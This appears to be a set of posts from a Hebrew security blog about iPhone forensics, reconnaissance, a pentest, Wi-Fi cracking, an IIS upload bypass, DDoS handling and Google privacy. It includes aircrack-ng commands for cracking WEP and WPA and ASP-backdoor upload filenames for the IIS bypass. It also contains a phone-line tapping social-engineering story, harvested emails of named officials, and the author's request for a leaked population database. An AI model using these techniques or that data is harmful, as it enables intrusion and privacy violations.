חברת Katana Software הוציאה מוצר מעניין לביצוע חקירות פורנזיות ל-iPhone.

המוצר נקרא Lantern והוא יודע לבצע כמה דברים מאוד מעניינים.

מי שמכיר כלים פורנזיים יודע שבד"כ מדובר בכלים מאוד מאוד יקרים. הכלי הזה עולה 400$, מחיר סביר מאוד.

הוא יודע להוציא כל מידע שאתם צריכים מתוך המכשיר וגם יש לו תוספות נחמדות.

אחד הדברים שלמדתי מהכלי הזה הוא שיש קובץ באייפון שפשוט שומר את כל הקשות המקלדת שלכם. כן, זה Keylogger מובנה מבית אפל באייפון.

כיוון שאין לי MAC, הייתי צריך להפעיל את זה על VM והחוויה נפגמת מעט בשל הצורך לחבר את האייפון ל-VM ויש לא מעט איטיות בתהליך.

גיבוי המכשיר שלי לקח כ-35 דקות.

בהחלט, מוצר מעניין למי שצריך לחקור אייפון.

למה לא לעדכן רשתות חברתיות כשאתם יוצאים לטיול?

בגלל שיש אתרים כאלה:

http://pleaserobme.com.

אני יודע שיש אנשים שחושבים שזה ממש חשוב לספר איפה הם בכל רגע של היום כי זה כנראה מעניין את כולנו (לא! תפנימו, זה לא מעניין!).

הרעיון זה שכשהם מעדכנים שהם במסעדת הדוד זרובבל ואוכלים כרגע זורבה, הם כנראה לא בבית.

מה נשאר לאנשים פחות חביבים לעשות? ללכת לבקר את הבית שלהם

לפני כמה שבועות ביצעתי PENTEST בחברה מסויימת.

אחד הנהלים שם הוא ששיחות למרכז התמיכה שלהם בנוגע לסיסמאות יכולות לקבל מענה רק מתוך החברה (שיחה מזוהה).

לחברה יש כמה סניפים גדולים וישנם די הרבה סניפים נוספים, חלקם ממש קטנים.

אז איך מאפסים סיסמאות בחברה כזו? מניחים שגם עובדי הסניף זכאים לקבל תמיכה.

אחד המשרדים הקטנים היה בבניין מוזנח בסביבות תל אביב.

הלכתי לשם, נכנסתי לבניין ואחרי שנייה הבנתי איך אני מאפס סיסמאות של משתמשים.

שיחה א' למחלקת התמיכה:

שלום, מדבר X. אני לא מצליח להתחברלמחשב.

אחרי כמה בדיקות התומך החליט שכדאי שיאפסו לי סיסמה. הבעיה? אני מטלפון נייד. הנוהל לא מאפשר לעשות את זה.

אני שואל מה הוא מציע והוא אומר לי לגשת לסניף הקרוב ולהתקשר משם.

בסניף היה קל. שאלתי אם משה נמצא ושאלו אותי איזה משה. הייתי צריך לברר אז ביקשתי להשתמש בטלפון שלהם כי לשלי נגמרה הסוללה.

נתנו לי לחייג לבד מהטלפון בלובי שלהם ואפילו השאירו אותי לבד לכמה דקות. סיסמה א' אופסה.

רציתי לראות אם יש עוד דרך.

יצאתי החוצה ובתחתית הבניין יש ארון של בזק. מעץ. לא נעול. הדלת אפילו קצת פתוחה.

טלפון פשוט = 35 ש"ח. שני קרוקודילים = 5 ש"ח. שיחת טלפון מהמספר של החברה בלי להיות בתוכה ובלי שאף אחד ישאל אותי מה אני עושה? PRICELESS.

הייתם חושבים שאצטרך כמה נסיונות עם החוטים שיש שם? על הדלתות הטכנאים של בזק רושמים איזה קו הולך לאיזו חברה. פשוט נהדר

הרעיון הוא שברגע שהטכנאי שעזר לי "הטריח" אותי לגשת לסניף הקרוב וכ"ו, הוא ויתר על אמצעי הזיהוי הנוספים. אני הרי בטוח עובד החברה. הוא זיהה אותי על פי מספר הטלפון.

מצטער על איכות הצילום..

theharvester הוא כלי מאוד חביב לאיסוף מידע על יעד לפני תקיפה (reconnaissance).
זה בעצם סקריפט python שיודע לסרוק ולחפש ב-google,bing ו-linked in כתובות מייל לפי דומיין שאתם רוצים. עוד מקור שהוא יודע לסרוק בו הוא שרתי PGP.
דוגמה אחת, על דומיינים gov.il נותנת את התוצאה הבאה (הגבלה ל-500 תוצאות ראשונות בגוגל):

./theHarvester.py -d gov.il  -l 500 -b google

*************************************

*TheHarvester Ver. 1.5              *

*Coded by Christian Martorella      *

*Edge-Security Research             *

*cmartorella@edge-security.com *

*************************************

Searching for gov.il in google :

======================================

Total results:  110000000

Limit:  500

Searching results: 0

Searching results: 100

Searching results: 200

Searching results: 300

Searching results: 400

Accounts found:

====================

arieo@iibr.gov.il

pn…@moin.gov.il

shadmiz@mot.gov.il

prashkerj@mot.gov.il

zarivatch@israeltrade.gov.il

attache.sg@israeltrade.gov.il

shlomosa@most.gov.il

elanza@sviva.gov.il

fkirshenbaum@knesset.gov.il

drotem@knesset.gov.il

lshemtov@knesset.gov.il

izchakec@knesset.gov.il

amichaeli@knesset.gov.il

ravraham@knesset.gov.il

radato@knesset.gov.il

yedri@knesset.gov.il

nhorowitz@knesset.gov.il

eaflalo@knesset.gov.il

mshitrit@knesset.gov.il

ggamliel@knesset.gov.il

ddanon@knesset.gov.il

zhotovely@knesset.gov.il

mgafni@knesset.gov.il

ylitzman@knesset.gov.il

yaakovy@cbs.gov.il

HEB@it.pmo.gov.il

legal@pmo.gov.il

shmuelh@knesset.gov.il

ycohen@knesset.gov.il

israel@geneva.mfa.gov.il

spokesperson@president.gov.il

pm_eng@pmo.gov.il

eulmert@knesset.gov.il

bnetanyahu@knesset.gov.il

minister@mod.gov.il

rond@pmo.gov.il

====================

Total results:  36

]]> http://guym.co.il/1272/feed 11 http://guym.co.il/1270?nucrss=1 http://guym.co.il/1270#comments Thu, 25 Feb 2010 08:51:18 +0000 ‫גיא מזרחי‬ http://guym.co.il/?p=1270 ‬]]>

תראו את התוכנה הזו:

http://www.iphoneil.net/?p=35996

רק תתקינו ומאז אפשר להיכנס פה.

http://www.ownspy.com/login.php

ואני שואל, כמה צריך לסמוך על חברה כזו כדי לתת לה גישה ברמה כזו לאייפון שלכם?
ואו, יש אנשים תמימים..

זה פשוט מצחיק

חבר שלח לי אתר(זהירות! אתר פורנו ולכן אין לינק!):

http://mporn.co.il/smsvideocard-main-heb-1-1.html

מה שמעניין שם זה שאם אתם רוצים להירשם לשירות, האתר מוודא שאתם בגיל המתאים.

לצורך כך האתר מבקש את תעודת הזהות שלכם ואת שנת הלידה שלכם ולאחר מכן הוא מוודא שתעודת הזהות אכן מוצלבת עם שנת הלידה הנכונה.

אני תוהה איך הם עושים הצלבה כזו?

אם הייתי צריך לנחש – מדובר ב-DB דוגמת אגרון או מרשם.

מה אתם חושבים? יש לכם רעיון איך מימשו את הבדיקה ללא שימוש במאגר?

אם זה באמת המצב (שימוש במאגר כגון אגרון) – אני חושב שזו חוצפה שמאגר כזה משמש חברה מסחרית בצורה כל כך גלויה ומחוצפת.

מרגיז!

האחראי לקוד הוא כנראה חוקר אבטחה פרילנסר שקשור לממשל והצבא הסיני.

היה לממשל גישה לעבודה שלו וכנראה כך הצליחו לייצר את ההתקפה.

איך עלו על זה ומצאו אותו? הבחור פרסם חלקים מהקוד באתר האקינג כלשהו וכתב שזו עבודה בתהליך.

פרטים נוספים:

http://www.readwriteweb.com/archives/chinese_hacker_behind_google_attack_found.php#comments

ויותר בהרחבה פה:

http://www.ft.com/cms/s/0/a6f5621c-1f21-11df-9584-00144feab49a.html?nclick_check=1

תודה לנחום ששלח לי.

יש לי משהו מעניין שרציתי לשתף בו את אחד מכתבי הטכנולוגיה.

מכרז – מי מעוניין?

למייל שלי: guy[at]hacking.org.il

תודה

ניב שלח לי סרטון שמראה כלי מגניב ביותר פריצת מנעולים.

כלי ממש חביב

חבר שלי, בוריס, פתח בלוג חדש בשם "פורסים את הרשת".

בוריס חוקר מעולה וכבר בפוסט הראשון אפשר לראות שיהיה מעניין.

אם אתם בעניין של SECURITY, תוסיפו ל-RSSים שלכם.

אז מה ל-WALLA ולאתר סקס? לכו תקראו..

1. גרסה חדשה ל-wireshark, 1.2.6.

2. גרסה חדשה ל-john the ripper 1.7.4.2.

3. גרסה חדשה ל-nmap 5.21.

ועוד עדכון קטן – אני בן 37

חבר שלח לי את הסרטון הזה. סרטון של למעלה מ-2 דקות אבל מכשיר האיזיפארק לא מוריד את הדקות האלה.

יש למישהו הסבר הגיוני או שאולי פשוט מצאו דרך נוחה לחנות בלי לקבל קנס?

בעקבות הפוסט שלי על "איך לפרוץ רשת אלחוטית" קיבלתי בשתי מקומות שונים תגובה שזה מדריך לסקידיז.

קודם כל, אני חייב לציין שאף האקר אמיתי לא צריך את המדריך שלי כדי לייצר פריצה כזו ולכן יש בכך סוג של אמת. נכתבו עשרות מאמרים באנגלית שמסבירים את זה ואני מניח שהאקרים יודעים לקרוא.

המדריך שכתבתי לא מיועד להאקרים. הם יודעים להסתדר לבד.

המדריך אמור להראות כמה קל לעשות את זה (וגם להפסיק את המיילים שאני מקבל פעמיים בשבוע על איך עושים את זה).

הנקודה שרציתי להעלות היא קצת שונה.

אם מי שמשתמש בשיטות האלה הוא סקריפט קיד, מה אמור לעשות האקר "אמיתי"?

הרעיון הוא שאם אני משתמש בכלי מוכן אני סקריפט קיד ואם אני האקר אמיתי אסור לי להשתמש בכלי מוכן?

אני חייב להגיד שלדעתי אלה שטויות במיץ.

מי שחושב שהאקר נמדד בכך שהוא מפעיל כלים שרק הוא כתב או לא, תצפה לו אכזבה כיוון שאני לא מכיר אף האקר שיכול להגיד שהוא לא משתמש בכלים שכתבו אחרים(ותאמינו לי, אני מכיר את רוב ההאקרים הטובים ביותר בארץ וחלק מהטובים בעולם).

כן, גם האקרים "אמיתיים" משתמשים במערכות הפעלה שכתבו אחרים, בתוכנות שונות החל מאופיס (או אופן אופיס) דרך תוכנות כיווץ, תוכנות הצפנה ועוד הרבה דברים.

לגבי פריצת WIRELESS, גם ההאקרים הטובים ביותר בעולם משתמשים בכלים כמו aircrack פשוט כיוון שהכלי זמין ואין צורך להמציא מחדש את הגלגל בכל פעם.

ההבדל הוא שהאקר יבין איך הכלי עובד ולא ידקלם שורות הפעלה.

האקר יכול להשתמש בכלים שכתבו אחרים אם זה מקצר את הזמן שלוקח לו לעשות דברים. האישיות של האקר לא תיתן לו להשתמש בכלי לפני שהוא מבין טוב טוב מה הכלי עושה, איך הוא בנוי ואיזו חולשה הוא מנצל.

בקיצור, לנפץ מיתוסים: האקרים משתמשים בכלים מוכנים. גם ההאקרים הטובים ביותר.

לא כל מי שמשתמש בסקריפט/כלי שכתב מישהו אחר הוא סקידי.

כיוון שאני עדיין מקבל את השאלה הזאת על בסיס קבוע.. אני אכתוב:

נתחיל בזה שהעניין כמובן בלתי חוקי אלא אם כן אתם מקבלים את רשותו של בעל הרשת ולכן כל המידע פה למטרות למידה.

כרטיס הרשת המומלץ הוא כרטיס מבוסס Atheros או Realtek, במקרה הזה אני משתמש ב-RT8187 והוא מעולה.

ניתן להשיג כרטיס כזה ב-DealExtreame פה:

http://www.dealextreme.com/details.dx/sku.20646

אם אתם רוצים משהו איכותי יותר אפשר להשקיע בכרטיס ALFA שניתן להשיג ב-EBAY בכ-50$.

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0

כל זה כדי להחליף את ה-MAC של כרטיס הרשת שלכם. לפריצה עצמה:

1. פריצת WEP עם Clients:

airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
aircrack-ng -b (bssid) file name-01.cap

2. פריצה של WPA עם Clients ועם מילון מוכן:

airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 –channel (channel) –bssid (bssid) -w /tmp/wpa
aireplay-ng -0 1 -a (same-bssid) -c (mac) mon0
aircrack-ng -w wordlist.txt  -b bssid /tmp/wpa*.cap

כמו שאתם מבינים, אנחנו צריכים מילון מוכן שיכיל בתוכו את המפתח.

יש הרבה מאוד בתים בארץ שהמפתח שלהם הוא מספר הטלפון או הסלולרי שלהם ולכן מילון שמכיל את כל הפרמוטציות של הספרות עד 10 תווים ייתן תוצאה לא רעה

למילון טוב יותר ניתן להשתמש ב-JOHN:

/pentest/passwords/jtr/john –stdout –incremental:all > wordlist.txt

שימו לב לעצור אותו כשהוא מגיע ל-10 תווים או כמה שרציתם להגיע..

מילון טוב (10 תווים של כל ה-ASCII) יכול להגיע למעל 200GB ככה שתדאגו שיש לכם מספיק מקום בשבילו.

יש פריצות מסובכות יותר שלא דורשות משתמש מחובר אבל למתחילים זה אמור להספיק

אין היום ארגון שלא כולל בתוכו מערכות מתוצרת Microsoft.

עד כמה משפיעות השקות של מוצרים חדשים על האבטחה בארגון?

זה ברור שהתשובה היא שיש קשר ישיר בין הטמעות של מוצרים חדשים לרמת האבטחה בארגון, אבל יש קשר גם להשקות עצמן? גם הארגון לא מתקין מוצר בעת ההשקה?

תחושת הבטן תגיד שזה ברור שכל עוד לא הטמענו מוצר בארגון שלנו הוא לא ישפיע על האבטחה בארגון, אבל זאת יכולה להתגלות כטעות חמורה.

אני אתן דוגמאות תיאורטיות:

1. מיקרוסופט השיקה את Internet Explorer 8. רוב הארגונים לא רצים לשדרג אליו בשל מגוון סיבות הכוללות את עלות ההתקנה וההטמעה, שינויים נדרשים בתוכנות פנימיות ובאתרי אינטרהנט, זמן עבודה, תקלות וכ"ו.

מצד שני, בבית אנשים קיבלו את העדכון באופן אוטומטי.

ה-IE החדש בטוח יותר ויודע להתמודד טוב יותר עם בעיות אבטחה הנוגעות לצד הלקוח. המשתמשים מוגנים יותר בבית ומתחילים לשנות הרגלי גלישה (באופן מודע או בלתי מודע) בהתאם לאיך שהדפדפן מגן עליהם.

עכשיו עם אותם הרגלים המשתמש מגיע אל הארגון ובו הדפדפן הישן והפחות מאובטח. יש כאן חשיפת המשתמש והארגון בו הוא עובד לבעיית אבטחה.

2. מהכיוון ההפוך:

עובד בבית הזמין "טכנאי" שהתקין לו מערכת הפעלה פרוצה.

העובד לומד שאסור לו לעדכן את אותה מערכת הפעלה כיוון ש-Microsoft מדי פעם חוסמים אותה עם WGA או צרות ורעות אחרות.

עם אותם ההרגלים העובד מגיע אל הארגון ומשתדל שלא לעדכן את המערכת (יש גם סיבות נוספות כמו: "זה עובד אז למה לגעת?" וכ"ו).

שוב – הארגון נחשף לבעיות אבטחה.

* יש לציין שאם מראש אתם משאירים את האפשרויות בידי העובד זו בעית אבטחה בפני עצמה, אך לצורך הדיון נשאיר את ההחלטה בידיו.

ברור לנו שהארגון לא אמור להסתמך על "המקצועיות" של העובדים כדי להישאר מוגן, אך יש לזכור שהחלטות טכנולוגיות רבות עדיין בידי העובד.

מעניין לחשוב עד כמה הארגון חושף עצמו לבעיות בשל העובדה שאינו מספק כלים שלו לעבודה בטוחה בבית (ואולי זו הסיבה שיש ארגונים רבים שכן מספקים מערכות הפעלה חוקיות, אנטיוירוס וכ"ו גם למחשבים בבתי העובדים).

בהמשך לכל זה אני רוצה להזכיר כנס שמיכל ממיקרוסופט סיפרה לי עליו:

http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032439163&culture=he-IL

משהו מגניב שהולך להיות שם זה מעבדות התנסות עם מוצרים (וגם ארוחת בוקר, חשוב לא פחות ).

הייתי הולך אם לא הייתי עסוק ביום שלישי..

ממש אהבתי את זה:

שוחררה ההפצה הרשמית של Back|Track4.ואפשר להוריד מפה:
http://www.backtrack-linux.org/downloads

מה שיותר מעניין זה ש- remote-exploit ו-BackTrack זה כבר לא אותם חבר'ה.
MUTS (מתי אהרוני) פרש מ-remote-exploit והוא ממשיך לפתח את Back|Track יחד עם אנשים מקהילת הפורומים.
יתר החבר'ה ב-remote-exploit החליטו שהם פורשים מפיתוח ההפצה וממשיכים במחקרים עצמאיים בתחום.
הם מתלוננים על כך שהקהילה גדלה מאוד ואין כבר הנאה בפיתוח ההפצה. הם רוצים לחזור לכיף (למחקר).

את BackTrack תוכלו למצוא פה: http://www.backtrack-linux.org ואילו remote-exploit משחררים בדומיין הישן מחקרים שלהם.

מעניין מה יקרה ההמשך.

היום דיבר איתי אדם חביב בשם מאור שמחפש להעסיק 1-2 האקרים (לעבודה רצינית, חבושים בכובע לבן ).

הצעתי לו שאפרסם את ההצעה פה והוא אישר.

Founded in 2006, we are a low–profile technology & consulting firm dedicated to the financial industry.

We help industry participants to accelerate the adoption of new technology, respond rapidly to market conditions, and reduce costs through a large scale of best-of-breed products.

We are looking for 1-2 "hackers" that can be interested in Ethical-Hacking Activity. (A new service that we want to provide, related to Fraud Inspection & prevention)

Not a Must – But surely advantage: Existing knowledge in – Real time systems, low latency technologies, trading platforms, High Frequency Trading System Integration or other related "stuff" for Trading-Technologies.

: Knowledge in Fraud Inspection & prevention.

Freelancers are also welcome.

We Offer you to join our Team, with the opportunity to get access to cutting edge technologies & important cpital market knowledge.

Cheers,

Maor ("Okidoki") tasoftware25@gmail.com

לכבוד השנה החדשה הולכים להיות פה כמה שינויים.

אחד השינויים הוא שעברתי לשרת אחר, חזק ויציב יותר (תודה שחר ).

שינוי נוסף הוא שהבלוג עובד לכתובת חדשה: http://www.guym.co.il.

כרגע שתי הכתובות עובדות, בקרוב אוסיף הפניית 301 מהכתובת הנוכחית לכתובת החדשה כדי שגוגל יתחיל לעבוד ולאנדקס אותה.

הסיבה למעבר לכתובת היא שהחלטתי שלא הוגן שלבלוג אישי אצרוך כתובת כזאת (http://hacking.org.il) ועדיף שיהיה כאן משהו שקשור לקהילה ולא רק אלי אישית.

מה הולך להיות בכתובת הזאת? הפתעה. אתם תדעו בתוך כמה שבועות .

תגידו מה שתגידו על הלמו.

הוא כנראה אוהב פרובוקציות, כנראה אוהב להסתבך עם רשויות, כנראה עובד בדברים שהם לא 100% חביבים לסביבה (עבד עם אמיר גנץ הספאמר) וכנראה שלא נרתע מלקמט קצת את החוק אבל רק לרמה שבה הוא לא יוכל להיות מורשע.

תגידו עליו את כל זה ועוד הרבה דברים, אבל חייבים לתת לו קרדיט אחד לפחות: הוא כשרוני.

כל פעם הוא פשוט מצליח להוציא את המדינה ואלה שעובדים ברשויות שלה (משטרה, אנשי מחשוב וכ"ו) בצורה אידיוטית. לפחות פעם חשבתי ככה.

היום אני פשוט חושב שהעובדים האלה מתנהגים בצורה רשלנית והלמו פשוט יודע למצוא את הרשלנות שלהם ממש טוב

ממליץ לקרוא את זה, הסיפור הנוכחי של הלמו:

http://halemo.net/edoar/0109/0004.html

למי שמתעצל ללחוץ על הלינק: איך אפשר להצפין משהו בעזרת Base64? הלמו מסביר..

Microsoft IIS 0Day Vulnerability in
Parsing Files

המקור פה: http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf

מדובר באפשרות לעקוף הגבלות בהעלאת קבצים לאתר.

תארו לכם אתר שמאפשר לכם להעלות אליו קובץ מסוג מסויים (נניח – JPG) וחוסם קבצי ASP או ASA כיוון שאלה קבצי הפעלה שאותם תוכלו להריץ ולפגוע בבטחון האתר.

אם תנסו להעלות את test.asp (נניח – קובץ backdoor) האתר יחזחר לכם הודעת שגיאה ויחסום את ההעלאה.

אבל אם תנסו להעלות את test.asp;.jpg שרת ה-IIS יקבל את הסיומת כ-ASP בעוד האפליקציה תזהה זאת כ-jpg ולכן הקובץ לא יחסם להעלאה ואף יוכל לרוץ.

עוד אפשרות היא להעלות קובץ בשם test.asp:.jpg, גם במקרה זה העניין יעבוד והאפליקציה מזהה זאת כתמונה ואילו IIS מזהה את הקובץ כ-asp.

אתמול בלילה שחר שלח לי SMS בערך באחת בלילה והודיע לי שהפורומים בהתקפת DDoS מטורפת.

עד שחזרתי אליו (רבע שעה אח"כ) הוא כבר פתר את הבעיה וסינן את כל המפציצים.

עוד לא ניתחנו את הלוגים יותר מדי אבל מה שהיה זה מעל 100K פניות מ-4 שרתים חזקים שעשו את המתקפה (כתובות ה-IP שלהם הן 209.67.232.200, 195.138.96.153, 74.220.207.94, 41.223.142.5).

הפורומים עמדו בהתקפה בצורה יפה – שחר כתב סקריפט חביב שמעיף את כל הבקשות של השרתים האלה והרים את השרת בלי בעיה רצינית והוא אפילו נהנה מזה

הבלוג יושב על שרת חלש יותר ולכן הוא הועף בלי בעיה תחת ההתקפה ולקח לי קצת זמן עד שהחזרתי אותו לפעולה.

למה זה קרה?

אני יכול רק לנחש שהסיבה היא החשיפה הגדולה לה זכו הפורומים בעקבות כך שהמשתמש labba מהקהילה שלנו הצליח לפרוץ את ה-DRM של ה-kindle של amazon.

הפורומים התפרסמו מאוד בעקבות העניין (תודה ל-labba על העבודה הנפלאה שהוא עושה בפורום) וכמות הכניסות מחו"ל דרך google translate קפצה באלפי אחוזים.

עדכון:

ההתקפות חזרו היום ביתר מרץ והרבה יותר שרתים השתתפו בהתקפה.

שחר הצליח להתגבר על זה גם הפעם

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place." – כך אומר Eric Schmidt, ה-CEO של google.

ממליץ בחום לקרוא את זה:

http://www.eff.org/deeplinks/2009/12/google-ceo-eric-schmidt-dismisses-privacy

ממליץ גם לקרוא את תגובתו של Bruce Schneier:

http://www.schneier.com/blog/archives/2009/12/my_reaction_to.html

מעצבנים אותי גוגל האלה..

אני כל הזמן חושב על חבורה של האקרים שיפרצו ויגנבו את המאגר הזוועתי הזה, אבל באמת צריך שזה יקרה?

כמה פעמים דלף מרשם האוכלוסין?

אתם חושבים שביטוח לאומי יותר טוב?

משרד הבטחון בטוח לא ידליף כלום, נכון?

אז איך זה קורה?

ככה:

http://law.co.il/computer-law/digital-assistant/2009/12/10/pamta-v-michael-bronfman

פשוט מזעזע..

אז בשעה טובה (הכוונה: רעה, רעה מאוד) יש לנו חוק מאגר ביומטרי.

אז איך אפשר לזייף טביעת אצבע שמצאתם?

ככה:

גם מכסחי המיתוסים עשו עבודה:

למה שה-OUTLOOK שלי יתחבר לשם? ועוד בפורט 80?

התעבורה ממש אפסית ומוצפנת..

יאללה, תיאוריות קונספירציה בבקשה

הטריגר הוא מישהו ששאל אותי בכיתה על שימוש ב-GMAIL + מייל של חבר ששלח לי לינק לכתבה על שירות חדש של גוגל – שירות DNS.

מה גוגל יכולה לדעת עליכם?

1. היא יכולה לקרוא את הדואר שלכם (GMAIL)

2. היא יודעת על כל אתר שאתם גולשים אליו ע"י חיפוש ויודעת כמובן להצליב את זה עם כתובת המייל שלכם.

3. היא יודעת על כל אתר שאתם גולשים אליו גם ללא חיפוש (אם אתם גולשים עם CHROME זה קל אבל אם לא, יש את Google Analytics שמותקן ב-40% מהאתרים ברשת ושלא תתבלבלו, אלה האתרים שאתם גולשים אליהם. יתר ה-60% בטח פשוט לא מתוחזקים ואתם לא מגיעים אליהם)

4. היא יודעת מי החברים שלכם: למי שלחתם הזמנות ל-GMAIL? מי החברים שלכם ב-google talk? למי שלחתם הזמנות ל- WAVE? מי שלח אליכם הזמנות כאלה?

5. היא יכולה להוציא סיסמאות של שירותים שנשלחו אליכם במייל (GMAIL).

6. אתם משתמשים ב-Google translate? עכשיו היא יודעת אילו שפות אתם מדברים (שפות הממשק של שירותי גוגל שבחרתם) וגם באיזה שפות אתם מעדיפים לקרוא (שפות שבחרתם לתרגם אליהם).

7. היא יודעת איזה אתרים אתם אוהבים וקוראים באופן קבוע (google reader).

8. יש לכם בלוג? הוא כמובן מאונדקס לתפארת.

9. google docs מאפשר להם לראות את המסמכים שכתבתם אצלהם.

10. google calendar אומר לגוגל איפה אתם נמצאים בכל זמן וגם עם מי אתם נפגשים.

11. חיפוש התמונות יצליב את המידע עליכם עם איך אתם נראים. מעניין שהם לא רכשו עדיין את face.com כדי לעשות את זה יעיל יותר.

12. google groups יסגיר תחומי עניין נוספים שלכם ואפילו ייתן תשובה על "מה השאלות שאתם מחפשים תשובות עליהם".

13. אתם מפתחים? יש google code בשבילכם. הרי צריך לדעת מה אתם מפתחים, מי אוהב את זה ומתעניין בכם וכ"ו.

14. השתמשתם ב-google mobile? מעולה. יש להם עכשיו גם את הטלפון שלכם (הם שולחים לכם באדיבות לינק ע"י SMS).

יש עוד דבר ששכחתי?

אהה… DNS.

עכשיו הם גם יכולים להפנות אתכם לכל אתר ואז להשלים את המידע שאולי ברח להם.

אשמח לשמוע מה אתם חושבים על זה:

1. מה השירותים (והמידע) ששכחתי להזכיר?

2. מה הם יכולים לעשות עם DNS? (אני מכין פוסט על זה..)

תוספות:

אביב ראף מפנה אותנו לשני הסרטונים האלה:

TheLeader:

מוסיף שיש חיפוש פרופילים: http://www.google.com/profiles?q=kevin+mitnick

וגם מפנה אותנו לסרט הזה שמדגים בעייתיות נוספת:

Prime תורם גם הוא:

ואיתן כספי תורם את הלינק הזה:

http://www.google-watch.org

ניוזגיק כותבים באותו נושא:

http://www.newsgeek.co.il/google-public-dns/

וכמובן:

גוגל בתחת:

אני שומע יותר ויותר על זה שיש אגרון חדש, 2009, שדלף לרשת ומסתובב בכל מני מקומות.

למרות שכישורי מציאת הדברים האלה די טובים אצלי, לא מצאתי עדות אמיתית לכך.

מישהו יכול לאשש את העניין?

אם למישהו יש את זה – מייל יתקבל בברכה

בזמן האחרון לא מעט גורמים מנסים (ולעיתים מצליחים) להדביק מחשבים ברוגלות ע"י רכישת מודעות GOOGLE ADSENSE.

מה הרעיון?

נניח שאני רוצה להדביק מחשב שלכם כדי לייצר בוטנט. כפי שכתבתי בעבר, יש שוק לא קטן לרכישות כאלה ולעיתים משולם סכום נאה עבור הדבקות שכאלה.

כל מה שאני צריך לעשות הוא להקים אתר או לפרוץ לאתר ולייצר ממנו הדבקות. איך? ברגע שאתם נכנסים לאתר תרוץ חבילת אקספלויטים לדפדפן.

האתר מריץ עליכם JAVASCRIPT כשאתם נכנסים ומנסה להדביק אתכם ע"י חולשות כאלה או אחרות (דוגמה אחת: מוריד לכם קובץ PDF נגוע ואם האקרובט שלכם לא מעודכן – נדבקתם).

אם אני מקבל על כל 1000 מחשבים מודבקים כמה עשרות דולרים אבל משלם כמה אחוזים מסנטים עבור כל נכנס לאתר, זה יכול להיות עסק לא רע. בייחוד אם אני מראש גונב את ה-ADSENSE ממישהו אחר (נניח ממחשבים שכבר הודבקו בבוט שלי שיש להם חשבון ADSENSE).

היתה כנראה פאשלה קטנה בקספרסקי (ניתן לקרוא פה ופה) ואחד העדכונים שלהם חסם את הפרסומות של ADSENSE לחלוטין!

מעניין כמה עלתה ה"פאשלה" הקטנה הזאת

מעניין אם גוגל בתגובה יחסמו "בטעות" את האתר של קספרסקי